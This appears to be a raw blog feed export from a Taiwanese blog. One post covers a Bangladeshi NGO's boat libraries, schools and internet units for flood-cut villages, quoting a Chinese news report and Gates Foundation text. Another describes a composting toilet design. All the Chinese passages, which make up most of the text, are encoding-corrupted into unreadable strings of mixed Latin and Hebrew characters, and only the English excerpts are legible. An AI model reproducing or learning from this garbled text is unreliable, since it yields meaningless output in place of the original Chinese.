/>¥t₪@₪ט­±¡A¹ן©ף"¾ַ®ױ"¡B"¹ֿ®ְׁ]"³o­׃Program×÷·§©ְ¡A₪]¦]¬°¹ך»×÷°ֳD¸ׁ¨M¦׃²£¥ֽ₪Fֵ₪ֶ¡C¦b¥H©¹¡A³o¨ג­׃Program¬O¬°₪F"¶°₪₪¡B¦¬ֲֳ" ×¾ֳׁ¡A´£¨ׁ₪@­׃"¦a₪ט"ֵ‎₪H­ּ¥h¾ַ²¡C±q­׳¹D°|¡B¾ַ®ױ¡B¹ֿ®ְׁ]¡B÷פ¸פ×÷₪@¸פ÷tֵ¡A¦b¦b³£»P·ם®ֹ×÷ְפ¹ׂ¯µ¸¦³·¥₪j×÷ֳצ«Y¡C¦׃³o­׃®׳₪l×÷½ל¨‎ֲI¡A«h¦b©ף±N¥H©¹"¥¨₪j¡B¶°₪₪"×÷¦a₪ט¡A¸H₪ֶ¦¨"³ז₪@¡B¬y°"×÷ֲI¡C¦׃³o­׃ֲI¡A¬O­׃¹ךֵי×÷×ֵ¶¡¡A¨ה₪W¸µµL§־×÷¬ל§¡B¸ך°T»P×¾ֳׁ¡C³o¬O¦h»ע¦³½ל×÷·Q¹³¡I<br /><br />ֱ¦³¡A¦µM¦a´÷×÷§ןֵ¡C¦]¬°¦µM®נ­װ¨ֿµM¡A«B©u×÷¨׃ֱ{¨ֿ¦a´÷³°×e¥ז´«¡A₪¬¬°×‎¹j×÷©¼¦¹¡A¦]¬°¦µM×÷»¼יQ¡Aֲאֵ₪F­ל¦³ֳ¦¬ֹ»ג°ל×÷ֳצ«Y¡A¦׃₪Hֳ‏¦b¨ה₪W×÷¥ז³q¡A₪]¦]¬°¦µM¸ֵי×÷ֲא´«¦׃ֵ´«¡C³o¬O«¹ך»×÷ֲאֵ¡C<br /><br />¦׃¨±׀×ּ»P±׀¨|×ּ¥D«ֵָיֳצ«Y×÷ֲאֵ¡A₪]«P¨ֿ₪F©ׂ¿׳"¬y°"×÷²£¥ֽ¡C¥t¥~¡A"©s¥[©װ"³o­׃©ׂ¿׳×÷²ִ₪T¥@¬ֹ¡A¹ן©ף²ִ₪@¥@¬ֹ×÷"¬°ך"¨׃»¡¬O­׃"¥L×ּ"(OTHER)¡A¦׃³o­׃¥L×ּ¥@¬ֹ×÷"²§°ך±¡½ױ"₪]¬O¨ֿ§·Pִ±"¦³½ל"×÷¯«¯µ¨׃·½₪§₪@¡C<br /><br /><br />¦׃³o®׳₪l¸עMichel Foucault×÷­ץ¾ַ«ה·Q«¹³¡C<br /><br />ֳצ©ף²מ¡A§«₪[¥H«e´¿¼g¹L₪@½gֳצ©ףMichel Foucault¦bֱ¿­z₪וְֳ´_¿³®ֹ´ֱֳצ©ף¡u·M₪H²מ¡v¡]the Ship of Fools¡^×÷₪ו³¹¡A¦³¿³½ל×÷₪H¥i¥H¬¬¡C<br /><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://ytc.blogspot.com/2004/04/blog-post.html">20031228 ·M₪H²מ</a><br /><br /><strong>YUAN-TZE Taipei,Taiwan</strong><br /><br /><br /><br /><br />¥H₪U×÷₪ו³¹ֲא¸¦ֱp¦X·s»D÷פ¡G<br /><br />-----------------------------------------------<br /><br /><span style="font-size:130%;color:#3366ff;"><strong><span style="font-size:100%;color:#ffcc00;">¬y°×÷¾ַ®ױ¡B¬y°×÷¹q¸£¢w©s¥[©װ°ך×÷¬G¨ֶ</span><br /></strong></span><span style="font-size:85%;color:#c0c0c0;">¡i₪‎©¦¡j</span><br /><br /><span style="color:#c0c0c0;">¦b₪Q₪כ¸¹×÷¬°ך¡m¾ַ®ױ¹ֿ®ְׁ]¾ַ¥Z¡n¡]School Library Journal¡^§¬¨ל₪@½g³ר¾ֹ¡A«·P°¡C³o¬O±װ­z©s¥[©װ°ך₪@­׃«D¬F©²×÷₪H¹D²ױֲ´₪T¦~¨׃¡A₪£ֲ_¥H₪p²מ¸°e®ִׁy¡B¹q¸£³]³ֶµ¥¾ַ²¸ך·½¡A§־¦¨¬y°¦¡×÷¾ַ®ױ¡A¨µ°j¥_³¡×u×e¬y°ל¥ז³q₪£«K×÷§ר¸¨¡A¨׃±׀¨|³o¨ַ½a¶m»קִ[×÷¥ֱ²³¡C<br /><br /><strong><span style="color:#3366ff;">¸µ¹ֿ®ׁ©M¹q¸£³]³ֶ×÷²מ¶₪</span></strong><br /><br />©s¥[©װ¡]Bangladesh¡^¬O₪@­׃²³©ׂ©P×¾×÷³h½a°ך®a¡A¥‏°ך¥u¦³30%×÷°ך¥ֱ¯א°ק¨ֹ¨¨ל¹q₪O×÷₪ט«K¦׃₪w¡C©s¥[©װ°ך×e¹D±K¥¬¡A¦³¡u₪פ₪₪₪§°ך¡v₪§÷¡A¦‎¨C¦~«B©u´ֱ¶¡¡]₪»₪כ¨ל₪Q₪כ¡^¡A×e₪פ¸g±`¼ֹ÷¦¡A¥ְֶ¦¨¨a¡A²T¨S¹D¸פ¡A³y¦¨¥ֱ²³×÷¥ז³q₪£«K¡A¾ַ®ױ°±½ׂ¡A¾ַ¥ֽ¾ַ²₪₪ֲ_§ף¬O±`¨ֶ¡A¯S§O¬O¦b¥_³¡°¾»·¦a°ֿ¡A³o÷״±¡×p§ף¬OִY­«¡C<br /><br />«D¬F©²×÷₪H¹D²ױֲ´¡uShidhulai Swanirvar Sangstha¡v¡A¦b₪T¦~«e¶}©l¥H₪Q´X¿´₪p²מ¡A¦b«B©u´ֱ¶¡¡A©µµNan-dakuja-Atrai-Boral ×e°ל¡A®i¶}₪G¦¥|₪Q₪½¨½×÷¨µ°j±׀¨|¡C³o₪ה²מ¶₪¡A¸¹÷¬y°×÷¾ַ®ױ©M¹ֿ®ְׁ]¡A¹³¬°ך₪½¦@¹ֿ®ְׁ]×÷¹ֿ®ׁ¨µ°j¨®©w´ֱ¦b₪s§ר³¡¸¨×A°ָ₪@¼ֻ¡A¦³×÷¸µ¹ֿ®ׁ¡A¦³×÷¸µ¹q¸£³]³ֶ©־¨ה¥L±׀¾ַ¸ך·½¡A½¬y°±¾n¦b×u×e×÷§ר¸¨×eֳה¡C¸µ¹q¸£×÷²מ°¦¡A°t¦³₪׃¶§¯א×÷µo¹q¾ק¡A¦]¦¹¯א§J×A§ר¸¨¯¥F¹q₪O×÷µ~¹ׂ¡C²מ°¦₪@¨ל§ר¸¨×eֳה¡A§ר¥ֱ©־¾ַ¥ֽ¥i½¬y¨ל²מ₪W¾ַ²¡B±µִ²¹q¸£¡A¦³₪u§@₪H­±׀¾ֹ¥L­ּ¨ֿ¥־¡C¡u¯א°ק¬¨ל¹q¸£¡A¿ֻ¦±µִ²¨ל¥¦¡A¬O§¥H«e₪£´±·Q¹³×÷¡I¡v₪@¦ל§ר¥ֱ³o¼ֻ·P´n×÷»¡¡F¦h¦~¨׃¡A¥L­ּ§x©ף¥¢·~¡B₪ו×¼₪־¯¥Fְח¾i©M¹q₪Oµ¥°ֳD¡A»P¥~¬ֹ×÷¸ך°T©M×¾ֳׁ¸¨®t¶V¨׃¶V₪j¡A²{¦b¬y°×÷¹q¸£¡A¨׃¨ל­±«e¡A§Y¨ֿ₪£¯אֵ‎¥L­ּ¸g±`¨ֿ¥־©־°¨₪W´N₪J₪ג¡A¦₪ײ¥‎¥´¶}₪F¥L­ּ×÷µרµ¡₪F¡C<br /><br /><strong><span style="color:#3366ff;">¬°×u×e₪K¸U₪»₪d₪­¦­׃®a®x<br />±a¨׃₪F¸ך°T¡B¾ַ²©M°V½m<br /></span></strong><br />¸ֻµ¹ֿ®ׁ×÷²מ°¦¡A«h¥iֵ‎§ר¥ֱ­ֹ¾\¡F¥t¥~¦³¨ַ²מ°¦¡A×ֵ¦ל¸¦h¡A¦¨¬°¬y°×÷±׀«ַ¡A₪u§@₪H­¥i¬°¦]₪פ¨a¯½ׂ×÷¾ַ¥ֽ¸ֹ¥R¾ַ²¡A©־×ּ¬°·ם¦a¥ֱ²³¶}³]₪@¨ַ¹A§@©־®·³½×÷¹ך°ָ½ׂµ{¡C<br /><br />³o₪ה¬y°×÷±׀¨|²מ¶₪¡A¦b₪G¡³¡³¥|¦~«K¬°×u×e₪K¸U₪»₪d₪­¦­׃®a®x±a¨׃₪F¸ך°T¡B¾ַ²©M°V½m¡C²ױֲ´×÷°ץ¦ז¥D÷Ab-dul Hasanat Mohammed Rezwan®M¥־¿p¨uְq¼w×÷¡u°²¦p₪s₪£¨׃¡A§´N¥h´N₪s¡v×÷¦W¨¥»¡¡G¡u°²¦p¾ַ¥ֽ₪£¯א¨׃¨ל¾ַ®ױ¡A¨÷»ע¾ַ®ױ´Nְ³¸׃¨ל¥L­ּ¨÷¸ּ¥h¡I¡v¥L­ּ×÷₪u§@¬O¦¨¥\×÷¡A²ִ₪@¡A¥L­ּ¨ֿ¥ז³q§xֳר¡B³q°T₪£«K¦a°ֿ×÷¥ֱ²³₪]¦³¨¨ל±׀¨|¡A±µ¦¬·s×¾×÷¾ק·|¡F²ִ₪G¡A©s¥[©װ¥_³¡°¾»·¦a°ֿ×÷¥ֱ²³¡A¥ֱ­·ֱ¬·ם«O¦u¡A³q±`₪£ֵ‎₪k¨א¨ל»·¦a¨D¾ַ©־ֵ‎°₪k¥X»·×ש¡A²{¦b¾ַ®ױ¦₪v¶]¨ל§ר¸¨¨׃₪F¡A°₪k¶}©l¥i¥H¨ל²מ₪W¾ַ²₪F¡C¾²־­p¡A¬y°×÷¾ַ®ױ¡B¹ֿ®ְׁ]©M¹q¸£³]³ֶ¡A¨ֿ¥־¨ל×÷¦³70%¬O°₪k¡A¥i¨£³o¹ן©s¥[©װ°₪k±׀¨|₪]¬O·¥¦³§U¯q×÷¡C<br /><br /><span style="color:#3366ff;"><strong>²מ°¦±q₪Q´X¿´ֲX¥R¨ל₪­₪Q¿´¡A<br />ִ~ִע×u×e×A°ָ</strong></span><br /><br />¥ׁ©ף³o­׃²ױֲ´×÷°^ִm¡A¥L­ּ¦b₪µ¦~₪K₪כְע±o·L³n₪½¥q³׀©l₪H₪ס÷¸»\¯ק©M¨ה₪ׂ₪H±צ×L¹F¦@¦P¦¨¥×÷¡u₪ס÷¸©M±צ×L¹F»\¯ק°ע×ק·|¡v¡]Bill and Melinda Gates Foundations¡^©ׂ³]¥×÷¡u¨D×¾·s³~¼ת¡v¡]Access to Learning Award¡^¡A¨ֳ±o¨ל¼ת§U×ק₪@¦¸U¬₪¸¡C³o­׃¼ת¶µ¬O°ע×ק·|­n±ֲ₪©¬°ך¥H¥~×÷₪½¦@¹ֿ®ְׁ]©־ֳ‏¦×÷¾ק÷c¡A×ם¹¨ה§Q¥־³׀·s©×÷­pµe¡A§K¶O¬°₪½²³´£¨ׁ¸ך°T×A°ָ©ׂ×ם²{×÷÷כ¯«¡A¨ֳ©e¥ׁ¬°ך¡u¹ֿ®ְׁ]₪־¸ך°T¸ך·½©e­·|¡v¡]Council of Library and Information Re-source¡^¨׃¥D«שµ¼f₪־¼f¬d¨ֶ©y¡F₪j³°×÷₪@­׃¡u₪₪°ך×ר«C¾נ¶m§ר¹ֿ®ׁ×A°ָ₪₪₪¡v¡]China Evergreen Public Library Service¡^²ױֲ´¡A¥h¦~₪]ְע±o³o­׃¼ת¶µ¡C<br /><br />¡uShidhulai Swanirvar Sangstha¡v§Q¥־₪ס÷¸»\¯ק×÷¼ת×ק¡A²{¦b₪w±N²מ°¦±q₪Q´X¿´ֲX¥R¨ל₪­₪Q¿´₪F¡A¬y°×÷±׀«ַ¡B¹ֿ®ְׁ]©M¹q¸£¡A±Nִ~ִע×u×e×A°ָ¡C</span><br /><br /><span style="color:#999999;">¡i2005/11/09 ֱp¦X³ר¡j ¢I <a href="http://udn.com">http://udn.com</a></span><br /><br /><br /><p><span style="color:#999999;"></span></p><p><span style="color:#999999;">--------------------------------------------------------------------</span></p><p></p><p>¥H₪U₪ו³¹¬°ֲא¸¦Bill & Melinda Gates Foundation÷פ¯¸(<a href="http://www.gatesfoundation.org/default">http://www.gatesfoundation.org/default</a>)¡G</p><p><span style="font-size:130%;color:#cc0000;"><strong>Shidhulai Swanirvar Sangstha</strong></span></p><p><span style="color:#c0c0c0;"><a href="http://photos1.blogger.com/blogger/2953/388/1600/b01.0.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/b01.0.jpg" border="0" /></a></span></p><p><span style="color:#c0c0c0;">Shidhulai Swanirvar Sangstha, a Bangladesh organization, received the 2005 Access to Learning Award for its innovative use of boats to deliver education and technology to isolated communities in flood-prone regions.<br />-------------------------------------------------------------</span></p><p><strong><span style="color:#3366ff;">Journey Out of Poverty</span></strong></p><p><span style="color:#999999;">Bangladesh, a nation of 140 million, has one of the highest population densities in the world with almost 1,000 people per square kilometer. Many people are landless and forced to live on and cultivate flood-prone land.</span></p><p><span style="color:#999999;">Ever since its bloody birth in a civil war in 1971, the country¡¦s biggest challenge has been to lift the vast majority out of grinding poverty. Policy makers and development practitioners have long concluded that in order to alleviate the problem, they must focus on educating people so they can be productive members of the work force.</span></p><p><span style="color:#999999;">But efforts to provide education to such a high number of people living in rural areas have been stymied by a number of problems, especially poor communication and lack of access to information resources. Nowhere is the problem more acute than in the remote areas of northern Bangladesh. And the problem is exacerbated during the monsoon season¡Xwhich lasts three to four months¡Xwhen people remain virtually cut off because of flooded roads.</span></p><p><span style="color:#999999;">Since 2002 the plight of a large number of people in the Nandakuja-Atrai-Boral watershed area in north Bengal is being addressed thanks to an innovative boat-based library and education program launched by a local nongovernmental organization.</span></p><p><span style="color:#999999;">¡§If the students cannot come to the school because of poor communication then the school should come to them,¡¨ said Abul Hasanat Mohammed Rezwan, executive director of Shidhulai Swanirvar Sangstha, which received the Bill &amp; Melinda Gates Foundation Access to Learning Award in 2005.</span></p><p><a href="http://photos1.blogger.com/blogger/2953/388/1600/b02.0.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/b02.0.jpg" border="0" /></a><br /><strong><span style="color:#3366ff;">Innovation at the Riverbanks</span></strong></p><p><span style="color:#999999;">The program, which served about 86,500 families in 2004, covers a radius of 240 kilometers of rivers, streams, and wetlands in northern Bangladesh. The integrated program, which includes a boat library, boat school, and mobile Internet boat unit equipped with computers, mobile phones, multimedia projectors, books, and other information resources, has raised hopes in Singra and adjoining areas. </span></p><p><span style="color:#999999;">¡§Seeing a computer, let alone touching it, was beyond our wildest imagination,¡¨ said Abdul Azad, a farmer, flashing a big grin that exposed his betel-stained teeth. Sitting under a mango tree in Kalinagar, a village of 4,500 people, he described the boat program as a godsend because it provides access to agricultural information, including pest management and commodity prices.<br />Targeting isolated river basin farming communities, the program is using information technology to improve living conditions in this extremely poor country. Mobile Internet-Educational units and libraries placed on boats navigate the Bangladeshi river network delivering information and training to people who are forced to live on and cultivate flood-prone land. The computers with Internet are run by solar systems and fuel-efficient generators as the project area has no electricity. According to official statistics, less than 30 percent of the Bangladesh population has access to electricity.</span></p><p><span style="color:#999999;">The area is deeply conservative, which means that many parents are reluctant to send their daughters to schools far away from their homes. Through the boat program, girls now can attend school because their parents and guardians can still keep an eye on them.<br />Seventy percent of the users of the boat program are women. Since they account for half the population in Bangladesh, ¡§there¡¦s no way we can move forward without empowering our womenfolk,¡¨ said Rezwan.</span></p><p><span style="color:#999999;">On a recent hot, humid day in July, a group of women were attending classes, taking computer lessons, and learning about modern farming and fishing techniques that emphasizes shunning pesticides in order to protect the environment.</span></p><p><span style="color:#999999;">Nazma Begum, a mother of two, proudly describes how she has benefited from the program. ¡§I¡¦ve been able to double my yield of eggplants and leafy vegetables in my small backyard,¡¨ she exclaimed.</span></p><p><span style="color:#999999;">She and others have learned new techniques from Dr. Samajit Pal, an agricultural scientist, who works for the government and volunteers for Shidhulai Swanirvar Sangstha. Dr. Pal travels about 70 kilometers to the project site every other month. Increasingly, he now addresses many of the farmers¡¦ problems through email, which he receives through the boat Internet unit.</span></p><p><a href="http://photos1.blogger.com/blogger/2953/388/1600/b03.gif"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/b03.gif" border="0" /></a><br /><strong><span style="color:#3366ff;">Access for All</span></strong></p><p><span style="color:#999999;">Shidhulai Swanirvar Sangstha plans to use the Access to Learning Award funds to double the existing fleet of 12 boat libraries to address the rising demand in the project area and beyond. The emphasis will be on increasing the number of computers, ensuring a reliable power supply, and providing training for staff.</span></p><p><span style="color:#999999;"></span></p><br /><br /><a href="http://photos1.blogger.com/hello/52/931/640/02.0.jpg"><img class="phostImg" src="http://photos1.blogger.com/hello/52/931/400/02.0.jpg" border="0" /></a><br /><br /><a href="http://photos1.blogger.com/hello/52/931/640/03.0.jpg"><img class="phostImg" src="http://photos1.blogger.com/hello/52/931/400/03.0.jpg" border="0" /></a><br /><br /><a href="http://photos1.blogger.com/hello/52/931/640/04.0.jpg"><img class="phostImg" src="http://photos1.blogger.com/hello/52/931/400/04.0.jpg" border="0" /></a><br /><br /><a href="http://photos1.blogger.com/hello/52/931/640/05.jpg"><img class="phostImg" src="http://photos1.blogger.com/hello/52/931/400/05.jpg" border="0" /></a><br /><br /><a href="http://photos1.blogger.com/hello/52/931/640/07.jpg"><img class="phostImg" src="http://photos1.blogger.com/hello/52/931/400/07.jpg" border="0" /></a><br /><br /><a href="http://photos1.blogger.com/hello/52/931/640/06.jpg"><img class="phostImg" src="http://photos1.blogger.com/hello/52/931/400/06.jpg" border="0" /></a><br /><br />----------------------------------------------------------------------------<br /><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://www.gatesfoundation.org/Libraries/InternationalLibraryInitiatives/AccessLearningAward/2005Award/default.htm">Bill &amp; Melinda Gates Foundation</a><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://udn.com/NEWS/READING/X5/index.shtml">ֱp¦X·s»D÷פ</a><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://sss.interconnection.org/index.htm">Shidhulai Swanirvar Sangstha</a><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://www.schoollibraryjournal.com/article/CA6260609.html">School Library Journal</a><br /><br /></span> -false - - - - -YUANTZE - -2005-11-05T01:32:00+08:00 -2005-11-04T17:32:56Z -2005-11-04T17:32:56Z - -tag:blogger.com,1999:blog-6815444.post-113112557603426590 -¹w¬ש₪U₪@¥N×÷´Z©ׂ -Dear All¡A<br /><br />₪§«e¥ׁµ¦®i₪H¨¿¼y©¨ֱ¨׃₪E¦ל°ך₪÷¥~«״¿v®v¡A¨ֳ±a»ג¹ך½מ₪j¾ַ«״¿v¨t¦P¾ַ°ׁ»P¡A¥H¡u«°¥«µd¿פ¡v¬°ֳD¡A±N°×¶¯»ס₪s»ס­ג¼s³ץ₪@±a¡A¹‎©³§ןְY´«­±¡A³o₪]¬O©Iְ³¥»©¡¥DֳD¬°¡uµo²{¨ָ¬w·s®a¡v×÷¡u2005²ִ₪T©¡¥xֶW³]­p³ױִ‎·|¡v¨t¦C¬¡°₪₪¦³₪@²ױֱֲ­^«T«״¿v®v±a»ג×÷¹־¶₪°µ₪F₪@­׃ֳD¬°¡q¹w¬ש₪U₪@¥N×÷´Z©ׂ¡r×÷§C¬ל§¥ֽ÷A´Z©ׂ¡C<br /><br />§ִ±±o«¦³½ל₪W÷פ¬d₪F₪@₪U¡A§ה¨ל₪F₪U­±×÷¸ך®ֶ¡A¦³¿³½ל¥i¥H¬¬¡C<br /><span class="fullpost"><br />¡m«°¥«µd¿פ¡n¢w¢w±q¦h₪¸«°¥«×ֵ¶¡·Q¹³¶}©l<br /><br /><a class="postlink" href="http://publish.pots.com.tw/Chinese/currents/2005/10/31/383_03currents/index.html" target="_blank">http://publish.pots.com.tw/Chinese/currents/2005/10/31/383_03currents/index.html</a><br /><br />¥H₪W×÷÷פ¯¸¦³ֳצ₪§«e¹ך½מ₪j¾ַ©ֱׂ|¿ל×÷³o­׃₪u§@ְח×÷¬ֳצ₪ו³¹¡Cֳשף­ל÷פ¯¸×©ֵv¡A¦³¿³½ל×÷×B₪ֽ´N³s₪W÷פ¯¸¬¬§a!<br />¥t¥~¡A±q³o­׃·s»D·j´M¨ל¦³ֳצֱֲ­^«T«״¿v®v©ׂ°µ×÷¥ֽ÷A´Z©ׂ¡A¦b¹ן©₪ABBS½׳¾ֲ₪₪¦³¬ֳצ¼צ¯P×÷°Q½׳¡Aֱֲ«״¿v®v¦b±a»ג¹ך½מ¾ַ¥ֽ©ף°×¶¯»ס₪s§@¦¹®׳₪l₪§«e¡C´N¦b2004¦~7₪כ¡A©ף®ֻ¶§×ל¶m§ר«״³]¾ַ°|«״³y₪F²ִ₪@©ׂ§¿ֱT₪ְ¶°¦¡¥ֽ÷A½ֳ¥ֽ´Z©ׂ¡A·ם®ֹ¦³¦U¦a30¦h­׃§׃ִ@×ּ°ׁ»P«״³y¡C<br /><br /><a class="postlink" href="http://www.abbs.com.cn/bbs/post/view?bid=1&id=7395345&amp;sty=1&tpg=1&amp;ppg=1&age=0#7395345" target="_blank">http://www.abbs.com.cn/bbs/post/view?bid=1&amp;id=7395345&sty=1&amp;tpg=1&ppg=1&amp;age=0#7395345</a><br /><br />¨ד½׳¾ֲ₪Wµo₪ו×÷§@×ּ«¥X¡A¦¹®׳×÷₪T­׃­«ֲI¬°¡G<br /><br /><span style="color:#ff9900;">1.¨ֿ¥־¥»¦a§ק®ֶ </span><br /><span style="color:#ff9900;">2.±ִ¥־§¿ֱT₪ְ¶°µL®`³B²z </span><br /><span style="color:#ff9900;">3.³ׂ°₪O±K¶°</span><br /><br />¥t¥~¡A°Q½׳₪ו₪₪´£₪־¦¹®׳×÷³]­p·Q×k¡G <span style="color:#ffcc00;">(¥H₪U₪ו¦r¬°¨ת¦ABBS½׳¾ֲ)</span><br /><br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/011.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/011.jpg" border="0" /></a><br /><br /><strong><span style="font-size:130%;"></span></strong><strong><span style="font-size:130%;">¹w¬ש₪U₪@¥N×÷´Z©ׂ</span> </strong><br /><strong>Eco Design Sustainable Composting Toilet</strong><br /><strong>±ֶ×n׫¡G×ב¶O¸ך·½×÷¼o±ף¡A©־¬O³׀³y¸ך·½×÷¦^¦¬¡H</strong><br /><br /><span style="color:#ff9900;">¥@¬ְֹפ«O»P¥ֽ÷A«״¿v·sֱֽ¶ױ¡G</span><br /><br />ֱT§¿₪ְ¶°¦¡«D¨R₪פ¥ֽ÷A´Z©ׂ×÷±ְ¼s¡Bְ³¥־»P¥i¦ז©¬ד¨s¡A¬Oֱp¦X°ך¦b³\¦h¦a°ֿ±ְ°×÷₪u§@¡A¦®¦b­±¹ן₪י¯qִY­«×÷₪פ¸ך·½¹¼¥F¡B´מ§C±H¥ֲֽ־»P¶ַ¬V¯f°ֳD¡B©M¾Aְ³₪_¥@¬ֹ¼s₪j¹A§ר¦a°ֿ×÷¥ֽ÷A»P¥ֽ²£ְפ¹ׂ¡C<br /><br /><span style="color:#ff9900;">»OֶW¦a°ֿ₪פ¸ך·½₪־¦¾₪פ³B²z²{׬¡G</span><br /><br />»OֶW¦a°ֿ₪s©Y°~®m¡A­°«B¨³³t¬y₪J®¬v¡A₪£¦P©u¸`­°«B¶q·¥₪£¥­§¡¡A®e©צ³y¦¨°®§ע¡C¨C₪H¨C¦~¹ך»₪ְ°t¨ל¥i§Q¥־₪פ¶q¡A¥u₪־¥@¬ֹ¥­§¡­ָ×÷1/6¡Aִ©ף¯₪פ¦a°ֿ¡C ¨C¦¸¦p´Z«ב¨R₪פ¡A»×ב¶O13₪½₪ֹ₪פ¶q¡C₪י±`¥ֽ¬¡₪₪©ג₪פ°¨±ם©ׂ³y¦¨₪§¯׃₪פ¡A¹Fֱ`¥־₪פ¶q35~40¢H₪§¦h¡C ¦ֳ₪פ₪U₪פ¹D»P¦¾₪פ³B²z¼tµ¥³]¬I¡A¯׃¶O₪d»ץ₪¸¹w÷ג¿³«״»P¹Bֲא¡A¥B¶ָ­­©ף₪j³£¥«¾A¥־¡C¦b₪₪₪p«¬³£¥«©־¹A§ר¡A₪U₪פ¹D»P³B²z¼t₪£²ֵ¦X¸gְ®ִ¯q¡A₪ֱֶT¦ְ₪@¼ֻ³y¦¨ְפ¹ׂ×÷¦ֳ¬V¡C ©Tֵי¡B²Gֵי±ֶ×n׫»µL®`₪ֶ₪§³B²z¾ק¨מ₪£¦P¡CֱT§¿²V¦X₪@¨ײ¨R₪J₪U₪פ¹D¡A₪j₪j¼W¥[¦¾₪פ³B²z₪§¦¨¥»¡C<br /><br /><span style="color:#ff9900;">ֱT§¿₪ְ¶°¥ֽ÷A´Z©ׂ₪§ְuֲI¡G</span><br /><br /><span style="color:#ffcc00;">1. µL®`₪ֶ¡G</span>ֱT»P§¿×÷³B²z₪£¦P¡C§¿¥²¶·ְR¸m₪~¥i¨ֿ¥־¡A¦׃ֱT«K»¸g²ז₪פ°®ְך¡B±‏·ְ¯fµֲ־§Z¡A¹FµL®`¡A₪£¦ֳ¬Vְפ¹ׂ¡A¹w¨¾¶ַ¬V¯f×÷½¯©µ¡CֱT§¿₪ְֲק¡A©צ©ףµL®`₪ֶ³B²z¡C<br /><span style="color:#ffcc00;">2. ½ֳ¥ֽ¡G</span>´Z§|°®ְך¡BµL¯ה¡BµLֳַ³I¡C<br /><span style="color:#ffcc00;">3. ¸`¬¡G</span>¨R₪פ¦¡´Z©ׂ±NֱT¦¾¶i¦זµ}ְֲִא²¾¡A¼W¥[³B²z­t¾ב¡FֱT§¿₪ְ¶°§K¨R¸`₪פ¡A´מ₪ײ±ֶ¦¾¡A¸`¬¬ֳצְx¹B©M³B²z³]³ֶ×ב¶O¡C<br /><span style="color:#ffcc00;">4. ₪ט«K¡G</span>ֱT«K¨C¥b¦~¨ל₪@¦~²M±ַ₪@¦¸¡A°®ְךµL¯ה¡A₪£µ¹₪H¹½´c·P¡A₪£³y¦¨¹B¿י¦ֳ¬V¡F÷²z₪ט«K¡A¨ֿ¥־¦w¥‏¡C<br /><span style="color:#ffcc00;">5. ¥ֽ÷A¡G</span>ֱT«Kֲא₪ֶ¦¨»G´׃½ט¬I×־§ן¨}₪gִ[¡A§¿×־©w´ֱµ}ְִ§Q¥־¡AֱT»P§¿¶i₪J¦µM¬ֹ×÷¦A°j°י¡A§Q©ף¥ֽ÷A¹A·~«״³]¡C<br /><span style="color:#ffcc00;">6. ¸gְ©¡G</span>³]­p¬I₪uֲ²³ז¡A¥i¶ל©±j¡A¸ױ¥־½d³ע¼s×x¡C¥»₪½´Z«״³y¶O¥־₪ײ©ף₪Q₪­¸U₪¸¡A»·§C©ף₪@¯כ₪½´Z³y»ש¡C<br /><span style="color:#ffcc00;">7. §­ב¡G</span>ֱT§¿₪ְ¶°´Z©ׂ₪£¥־₪פ¡AֱT«K°®ְך¹Lµ{₪₪₪פ₪ְ­°§C¡A§­ב¯א₪O¼W±j¡A¬°°×½n«׳¡B°×®©¦a°ֿ¹A§ר´Z©ׂ«״³]´£¨ׁ«ה¸פ¡C<br /><br /><span style="font-size:85%;color:#cccccc;">°_³y×ּ¡G ֱֲ­^«T «״¿v®v </span><br /><span style="font-size:85%;color:#cccccc;">¨ף₪Oְח³y¡G ₪־r₪ֳ §ץ»A¸ײ ­Jµq³ ױז ₪ׁ ²ר¶{¶W ·¨­YµY ³¢­s¼ ֱֲ©v¾ֻ ¹ך½מ₪j¾ַ«״¿v¨t </span></span><br /><span class="fullpost"><br /><br /></span><span class="fullpost"><p>´Z©ׂ¦p¦ף«״³y¡H</p><p><a href="http://photos1.blogger.com/blogger/2953/388/1600/all.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/all.jpg" border="0" /></a></p><p><a href="http://photos1.blogger.com/blogger/2953/388/1600/all2.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/all2.jpg" border="0" /></a></p><p>®ֻ¶§×ל¶m§ר«״³]¾ַ°|¥ֽ÷A½ֳ¥ֽ´Z©ׂ<br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/a01.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/a01.jpg" border="0" /></a> </p><a href="http://photos1.blogger.com/blogger/2953/388/1600/a02.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/a02.jpg" border="0" /></a><br /><br />¥xֶW°×¶¯»ס₪s¥«»ס­ג¼s³ץ<br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/b02.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/b02.jpg" border="0" /></a><br /></span><br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/b01.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/b01.jpg" border="0" /></a><br /><br /><br />YUAN-TZE Taipei, Taiwan<br /></span> -false - - - - -YUANTZE - -2005-10-23T15:14:00+08:00 -2005-10-24T17:16:37Z -2005-10-23T07:23:16Z - -tag:blogger.com,1999:blog-6815444.post-113005219621881457 -µu¼ָ×÷°k₪`¡A¬°₪F¡m₪£¦´¡n¥H₪־¡m×´÷ְ×÷¦W¦r¡n - -
